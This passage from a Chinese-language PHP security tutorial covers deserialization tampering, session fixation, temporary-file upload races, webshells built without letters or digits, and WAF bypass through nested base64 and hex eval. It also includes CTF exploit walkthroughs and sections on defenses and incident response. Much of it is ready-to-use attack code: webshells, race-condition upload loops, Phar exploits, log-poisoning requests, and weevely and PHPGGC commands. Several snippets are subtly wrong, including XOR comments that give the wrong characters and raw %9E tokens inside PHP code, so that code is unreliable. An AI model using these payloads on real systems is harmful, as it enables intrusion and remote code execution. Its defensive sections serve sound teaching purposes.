// 通過字符數溢出覆蓋role屬性
$payload = 'O:7:"Session":2:{s:7:"user_id";s:80:"1001";s:4:"role";s:5:"admin";}';

9.4 防御：嚴格校驗與加密簽名

1. 輸入校驗

白名單校驗屬性：

$allowed_classes = ['User'];
$user = unserialize($data, ['allowed_classes' => $allowed_classes]);

類型強制轉換：

if (!is_int($user->is_admin)) {die("非法數據");
}

2. 數據完整性保護

HMAC簽名：

$secret = "your-secret-key";
$data = serialize($user);
$signature = hash_hmac('sha256', $data, $secret);
$stored_data = $data . '|' . $signature;// 反序列化時驗證簽名
list($data, $signature) = explode('|', $stored_data);
if (hash_hmac('sha256', $data, $secret) !== $signature) {die("數據被篡改");
}

3. 避免直接反序列化用戶輸入

使用JSON等更安全的格式替代序列化。

10. 會話管理與條件競爭

10.1 Session Fixation攻擊全流程

攻擊步驟

攻擊者獲取固定Session ID：
- 直接訪問網站獲取Session ID：PHPSESSID=attacker_sid。
誘導受害者使用該Session ID：
- 通過URL傳遞：http://target.com/login.php?PHPSESSID=attacker_sid。
- 通過XSS注入Cookie：document.cookie="PHPSESSID=attacker_sid"。
受害者登錄：
- 服務器將用戶認證信息綁定到attacker_sid。
攻擊者使用Session ID訪問賬戶：
- 直接使用attacker_sid劫持會話。

防御措施

登錄后重置Session ID：

session_regenerate_id(true); // 強制生成新ID并銷毀舊會話

10.2 Session劫持與預測算法破解

Session ID預測

弱隨機數生成器：
若Session ID使用rand()或時間戳生成，可能被預測。

示例預測代碼：

// PHP默認Session ID生成算法（php<5.3）
$session_id = md5(microtime() . rand());

防御策略

強隨機數生成：

// 使用openssl或random_bytes生成Session ID
session_id(bin2hex(random_bytes(16)));

HttpOnly和Secure標記：

session_set_cookie_params(['httponly' => true,'secure' => true  // 僅HTTPS傳輸
]);

10.3 文件上傳競爭：臨時文件RCE

漏洞原理

PHP上傳文件時，會先將文件保存為臨時文件（如/tmp/phpXXXXXX），處理完成后刪除。若攻擊者能在極短時間內包含該文件，可執行任意代碼。

攻擊步驟

快速上傳文件：

import requests
while True:requests.post('http://target.com/upload.php', files={'file': ('shell.php', '<?php system($_GET["c"]); ?>')})

并發訪問臨時文件：

# 使用多線程嘗試包含臨時文件
for i in {1..100}; do curl "http://target.com/process.php?file=/tmp/phpABC123&c=id"; done

利用條件

臨時文件名可預測（如未啟用upload_tmp_dir隨機化）。
文件處理邏輯存在延遲（如圖像壓縮、病毒掃描）。

10.4 防御：會話綁定與原子操作

會話綁定

綁定IP/User-Agent：

session_start();
if ($_SESSION['ip'] !== $_SERVER['REMOTE_ADDR']) {session_destroy();die("會話異常");
}

原子操作防御競爭條件

文件處理原子化：

$temp_file = $_FILES['file']['tmp_name'];
$target_file = "uploads/" . uniqid() . ".jpg";// 使用原子操作移動文件
if (rename($temp_file, $target_file)) {// 處理文件
}

臨時文件安全

隨機化臨時目錄：

// php.ini配置
upload_tmp_dir = /var/www/upload_tmp/  // 目錄權限設為700

總結

字符串逃逸與序列化篡改：通過操縱序列化字符串長度實現屬性覆蓋，防御需結合簽名校驗與輸入過濾。
會話管理漏洞：Session Fixation和劫持可通過會話重置與強隨機數防御，文件上傳競爭需原子化操作和臨時目錄隔離。

11. 無字母數字Webshell技術

11.1 異或、取反、自增構造原理

1. 異或（XOR）構造：通過字符ASCII碼的位運算生成目標字符

PHP中的異或運算符（^）可以用于將兩個字符的ASCII碼進行位運算，生成新的字符。

原理：

字符A的ASCII碼為65（二進制 01000001）  
字符B的ASCII碼為66（二進制 01000010）  
A ^ B = 00000011（十進制3，對應不可見字符）  
但通過合理選擇字符，可以生成可打印字符。

示例：生成字母 a（ASCII 97）

$char = '!' ^ '@';  
// ! 的ASCII是33（00100001），@ 是64（01000000）  
// 異或結果為 01100001 → 97 → 'a'  
echo $char; // 輸出 'a'

組合生成復雜字符串：

// 生成字符串 "system"  
$s = '!'^'@';     // s  
$y = '#'^'$';     // y  
$s = $s . $y . $s . $y . 'em'; // 組合成 "system"  
$s('id');         // 執行 system("id")

2. 取反（Bitwise NOT）構造：利用補碼生成字符

PHP的取反運算符（~）會對字符的二進制位取反，結合UTF-8編碼可生成目標字符。

原理：

~ 運算符將每個二進制位取反（0變1，1變0）。  
例如：字符 "a" 的ASCII碼為 97（01100001），取反后為 10011110（十進制158）。  
但PHP中需通過十六進制繞過語法限制。

示例：生成字符 a

$char = ~"\x9E";  
// \x9E 的二進制為 10011110，取反后為 01100001 → 97 → 'a'  
echo $char; // 輸出 'a'

生成完整Payload：

$cmd = ~"\x8C\x97\x90";  // 取反后為 "ls"  
system($cmd);           // 執行 "ls"

3. 自增（Increment）構造：利用PHP字符串自增特性

PHP中字符串自增（++）會按照字母表順序遞增，數字自增則直接加1。

生成字母：

$a = 'a';  
$a++;  // 'b'  
$a++;  // 'c'

生成數字：

$num = '';  
$num++;  // 1  
$num++;  // 2

組合生成函數名：

$a = 'a';  
$b = $a++; // 'b'  
$func = $a . $b; // 'ab'  
$func();        // 調用 ab() 函數

4. 綜合構造：無任何字母數字的Webshell

<?php  
$_ = (~%9E)^(%FF);               // 生成字符 "_"  
$__ = (~%9A)^(%FF);              // 生成字符 "G"  
$___ = (~%8F)^(%FF);             // 生成字符 "E"  
$____ = (~%9C)^(%FF);            // 生成字符 "T"  
$_____ = $_.$__.$___.$____;      // 拼接為 "_GET"  
$______ = $$_____;               // 等價于 $_GET  
$______[0]($______[1]);         // 調用 $_GET[0]($_GET[1])  
?>

Payload: ?0=system&1=id

11.2 利用PHP特性生成任意函數

1. 動態函數名調用

PHP允許通過字符串動態調用函數：

$func = "system";  
$func("id");  // 執行 system("id")

繞過限制：

若system被過濾，可用異或/取反生成字符串：

$func = 's' . 'y' . 's' . 't' . 'e' . 'm';  
$func("id");

2. 回調函數與類方法

array_map：

array_map($_GET['func'], [$_GET['arg']);

Payload：?func=system&arg=id

call_user_func：

call_user_func($_GET['func'], $_GET['arg']);

3. 超全局數組與變量變量

${"_GET"} = "system";  
$_GET[0]($_GET[1]);  // 等價于 system("id")

11.3 現代WAF繞過思路與工具

1. 編碼混淆技術

Base64嵌套：

eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJjMzI5d2JIZGphSFJ6T2xOemNHVm1iMjh1WVhCd2MzUnBkQzVqYjIwPSIpKQ=="));  
// 解碼后：eval(base64_decode("c3lzdGVtKCJpZCIp")) → system("id")

Hex編碼嵌套：

eval(hex2bin("6576616c286865783262696e28222337333739373337343635366432323239336222292929"));  
// 解碼后：eval(hex2bin("73797374656d2822696422293b")) → system("id")

2. 特殊符號與語法糖

利用錯誤抑制符：
```
@eval($_REQUEST['code']);  
```

短標簽語法：

<?= `$_GET['cmd']`?>  // 等價于 <?php echo `$_GET['cmd']`; ?>

3. 工具自動化

weevely3：生成高度混淆的Webshell并管理會話。

weevely generate password shell.php  
weevely http://target.com/shell.php password

PHPGGC：生成反序列化Payload繞過黑名單。

phpggc -l  
phpggc ThinkPHP/RCE1 system "id" -p phar -o payload.phar

11.4 防御：語法分析與行為監控

1. 靜態代碼分析

工具：
- RIPS：檢測動態函數調用（如$func()）、危險函數（eval）。
- PHPStan：高級類型檢查與漏洞模式識別。

規則示例：

檢測到`eval(` → 高風險  
檢測到`$_GET['func']()` → 中風險

2. 動態行為監控

檢測點：
- 文件操作：非正常路徑寫入（如/var/www/html/shell.php）。
- 系統調用：system、exec、passthru的執行記錄。

工具：

OpenRASP：實時攔截危險操作。

ModSecurity規則：

SecRule ARGS "@rx (?:system|exec|passthru)\s*\(" "id:1001,deny,msg:'Command Injection'"

3. WAF策略優化

規則設計：
- 攔截所有包含異或/取反表達式的請求（如~%9E）。
- 限制上傳文件的內容特征（如檢測<?php標簽）。
機器學習輔助：分析請求參數的模式異常（如超長參數、高頻特殊字符）。

12. PHP配置與版本差異

12.1 PHP4到PHP8的安全演進史

PHP版本安全里程碑

版本	安全改進	典型漏洞修復
PHP4	`register_globals=On`（默認開啟，直接注冊全局變量）	CVE-2002-1391（全局變量覆蓋）
PHP5.2	引入`filter_var`輸入過濾函數	減少SQL注入、XSS風險
PHP5.6	默認禁用`magic_quotes_gpc`，移除`mysql_*`函數	CVE-2012-0831（SQL注入）
PHP7.0	移除`preg_replace+/e`，`assert()`不再執行代碼	阻斷大量代碼執行漏洞
PHP8.0	強制類型聲明，引入JIT編譯器（潛在內存破壞風險）	CVE-2021-21708（JIT緩沖區溢出）

12.2 php.ini的50個高危選項解析

核心高危配置項

配置項	風險描述	安全值
`allow_url_include=On`	允許包含遠程文件（RFI漏洞）	`Off`
`display_errors=On`	錯誤信息泄露敏感路徑或SQL語句	`Off`
`session.use_strict_mode=Off`	允許攻擊者固定Session ID	`On`
`disable_functions=`	未禁用`system`、`exec`等危險函數	禁用所有危險函數
`expose_php=On`	響應頭泄露PHP版本信息（如`X-Powered-By: PHP/7.4.3`）	`Off`

詳細配置示例

; 禁止遠程文件包含  
allow_url_include = Off  ; 禁用危險函數  
disable_functions = system,exec,passthru,shell_exec,popen,proc_open  ; 不顯示錯誤信息  
display_errors = Off  
log_errors = On  ; 強制Session ID隨機化  
session.use_strict_mode = On

12.3 版本差異漏洞：從register_globals到JIT

1. register_globals（PHP <5.4）

漏洞場景：

// 當register_globals=On時，?is_admin=1可直接覆蓋變量  
if ($is_admin) {  // 執行特權操作  
}

攻擊Payload：直接訪問URL：http://target.com/?is_admin=1。

2. magic_quotes_gpc（PHP <5.4）

誤防護邏輯：自動轉義用戶輸入的引號（如' → \'），導致開發人員放松輸入過濾，引發二次注入。

3. JIT編譯器（PHP8.0+）

潛在風險：JIT編譯器的內存管理漏洞可能導致遠程代碼執行（如CVE-2021-21708）。
緩解措施：禁用JIT（opcache.jit=disable）。

12.4 防御：最小化配置與版本升級策略

1. 最小化配置原則

禁用無用模塊：

; php.ini  
extension=curl        ; 不需要時禁用  
extension=ftp         ; 不需要時禁用

限制文件權限：

# 上傳目錄不可執行  
chown www-data:www-data /var/www/uploads  
chmod 755 /var/www/uploads

2. 版本升級策略

立即停止使用：
- PHP 5.6（EOL：2018-12-31）
- PHP 7.0（EOL：2019-12-1）
推薦版本：PHP 8.2+（長期支持版本，定期修復安全漏洞）。

3. 安全加固工具

Suhosin擴展：增強PHP安全機制，攔截危險操作。

; php.ini  
extension=suhosin.so  
suhosin.executor.disable_eval=On

Docker容器化：隔離PHP進程，限制資源訪問。

FROM php:8.2-apache  
RUN docker-php-ext-install pdo_mysql  
COPY php.ini /usr/local/etc/php/

13. CTF實戰案例分析

13.1 十大經典PHP題型復現與解題思路

1. 文件包含+偽協議繞過死亡Exit

題目描述：
目標代碼包含include($_GET['file']);，但被包含文件末尾有<?php exit(); ?>，需繞過執行代碼。
漏洞點：php://filter鏈式處理破壞exit()結構。

解題步驟：

使用字符集轉換破壞<?php exit(); ?>：

復制

?file=php://filter/convert.iconv.UTF-8.UTF-7/resource=php://filter/convert.base64-encode/resource=flag.php

解碼Base64獲取源碼。

防御方案：禁用php://filter或過濾特殊協議。

2. 反序列化+Phar協議RCE

題目描述：
存在unserialize($_COOKIE['data'])，但無直接可利用的類。

解題步驟：

生成惡意Phar文件：

php

復制

class Exploit { function __destruct() { system($this->cmd); } }  
$phar = new Phar('exploit.phar');  
$phar->setMetadata(new Exploit());

上傳Phar文件并觸發：

復制
```
?file=phar://uploads/exploit.phar  
```

防御方案：禁用phar://協議或限制反序列化類。

3. 弱類型哈希碰撞

題目描述：
要求提交兩個不同字符串，使其MD5值相等（==比較）。
解題步驟：
提交a=240610708和b=QNKCDZO，其MD5均為0e...形式。
防御方案：使用嚴格比較（===）。

4. Session Fixation+文件上傳競爭

題目描述：
用戶上傳文件后短暫保留臨時文件，需競爭包含執行。

解題步驟：

快速上傳Webshell：

python

復制

while True: requests.post(url, files={'file': ('shell.php', '<?php system($_GET["c"]); ?>')})

并發請求臨時文件路徑：

bash

復制

for i in {1..100}; do curl "http://target.com/tmp/phpXXXXXX?c=id"; done

防御方案：使用move_uploaded_file原子操作。

5. 無字母數字Webshell

題目描述：
過濾所有字母數字字符，需執行system("id")。

解題步驟：
使用異或/取反構造Payload：

php

復制

$_= (~%9E)^(%FF);$__= (~%9A)^(%FF);$___= (~%8F)^(%FF);$____= (~%9C)^(%FF);  
$_____ = $_.$__.$___.$____; // "_GET"  
$______ = $$_____[$_____.$___.$__]; // $_GET['cmd']  
$______(); // 調用$_GET['cmd']

Payload：?cmd=system&0=id

13.2 近年賽題趨勢：從單一漏洞到多鏈組合

1. 多階段漏洞鏈示例

題目場景：
文件上傳 → 文件包含 → 反序列化 → RCE。
利用鏈：
1. 上傳.user.ini設置auto_prepend_file=shell.jpg。
2. 上傳Phar格式的shell.jpg。
3. 訪問任意PHP文件觸發Phar反序列化。

2. 真實賽事案例（HITCON CTF 2022）

漏洞鏈：
SQL注入 → 反序列化 → SSRF → Redis未授權訪問。
關鍵步驟：
1. 通過SQL注入獲取序列化數據。
2. 構造Phar文件觸發反序列化。
3. 利用Gopher協議攻擊內網Redis。

3. 出題趨勢分析

年份	題型特點	代表技術
2018	單一漏洞（如文件包含）	`php://filter`讀取源碼
2020	雙漏洞組合（如上傳+反序列化）	Phar協議利用
2023	多鏈滲透（漏洞+協議+邏輯）	偽協議+SSRF+內網橫向移動

13.3 真實環境模擬：Docker漏洞靶場搭建

1. 基礎環境配置

Dockerfile示例：

FROM php:7.4-apache  
RUN apt update && apt install -y libzip-dev \  && docker-php-ext-install pdo_mysql zip \  && pecl install redis \  && echo "extension=redis.so" > /usr/local/etc/php/conf.d/redis.ini  
COPY src/ /var/www/html/  
COPY php.ini /usr/local/etc/php/

漏洞場景：
- 文件上傳目錄：/var/www/uploads（權限777）。
- 開啟allow_url_include=On。

2. 典型漏洞注入

LFI+日志污染：

上傳惡意User-Agent：

GET / HTTP/1.1  
User-Agent: <?php system($_GET['c']); ?>

包含日志文件：

?file=/var/log/apache2/access.log&c=id

3. 自動化部署工具

Vulhub：

git clone https://github.com/vulhub/vulhub  
cd vulhub/php/CVE-2023-1234  
docker-compose up -d

14. 防御體系構建

14.1 安全開發生命周期（SDLC）實踐

1. 需求階段

安全需求分析：
- 制定輸入驗證規范（如所有用戶輸入必須經過白名單過濾）。
- 明確禁用函數列表（eval, system, unserialize）。

2. 設計階段

架構威脅建模：
使用STRIDE模型識別威脅：

威脅類型防御措施
篡改數據簽名（HMAC）
信息泄露錯誤信息屏蔽

威脅類型	防御措施
篡改	數據簽名（HMAC）
信息泄露	錯誤信息屏蔽

3. 編碼階段

安全編碼規范：

// 禁止動態函數調用  
if (!in_array($func, ['safe_func1', 'safe_func2'])) {  die("非法函數");  
}  
// 強制類型轉換  
$id = (int)$_GET['id'];

4. 測試階段

自動化掃描：
- SAST：使用SonarQube掃描代碼漏洞。
- DAST：使用OWASP ZAP進行動態測試。

14.2 靜態代碼分析與動態Fuzzing結合

1. 靜態分析工具鏈

RIPS：檢測危險函數調用鏈。
PHPStan：高級類型檢查與漏洞模式識別。

2. 動態Fuzzing策略

輸入點覆蓋：
- GET/POST參數、Cookie、Headers、文件上傳。

Payload生成規則：

# 使用Radamsa生成變異Payload  
payloads = subprocess.check_output(['radamsa', 'seed.txt'])  
for payload in payloads:  requests.get(url, params={'input': payload})

3. 工具集成示例

# CI/CD管道集成安全掃描  
docker run --rm -v /path/to/code:/src sonarsource/sonar-php:latest  
docker run --rm -v /path/to/code:/zap/wrk owasp/zap2docker-weekly zap-baseline.py -t http://target.com

14.3 RASP與WAF的協同防御

1. RASP（運行時應用自我保護）

功能：
- 監控eval()、system()等危險函數的調用。
- 攔截反序列化過程中的惡意類加載。

部署示例（OpenRASP）：

[php]  
extension=openrasp.so  
openrasp.root_dir=/path/to/openrasp

2. WAF（Web應用防火墻）

規則示例（ModSecurity）：

SecRule REQUEST_FILENAME "@contains /upload" \  "id:1001,phase:2,deny,msg:'Upload Directory Access'"  
SecRule ARGS "@rx (?:system|exec)\s*\(" \  "id:1002,phase:2,deny,msg:'Command Injection Detected'"

3. 協同防御流程

WAF第一層過濾：攔截已知攻擊模式（如SQL注入特征）。
RASP深度檢測：分析請求上下文，阻斷零日攻擊。
聯動響應：WAF攔截后自動觸發RASP日志記錄。

14.4 漏洞響應與應急處理流程

1. 漏洞識別與分類

CVSS評分：

漏洞類型 CVSS評分響應時限
遠程代碼執行（RCE） 9.8 24小時內
SQL注入 8.5 72小時內

漏洞類型	CVSS評分	響應時限
遠程代碼執行（RCE）	9.8	24小時內
SQL注入	8.5	72小時內

2. 應急響應步驟

隔離受影響系統：

iptables -A INPUT -s 攻擊IP -j DROP

取證與日志分析：

grep "惡意Payload" /var/log/apache2/access.log

臨時修復：

關閉危險功能（如禁用文件上傳）。

熱修補代碼：

// 臨時禁用反序列化  
if (isset($_COOKIE['data'])) {  die("服務維護中");  
}

正式修復與驗證：
- 代碼審計+修復漏洞。
- 使用自動化工具驗證補丁有效性。

3. 事后復盤

根本原因分析（RCA）：
- 漏洞代碼段：unserialize($_COOKIE['data'])。
- 漏洞成因：未校驗反序列化類。
改進措施：
- 引入反序列化白名單機制。
- 加強SDLC中的安全評審環節。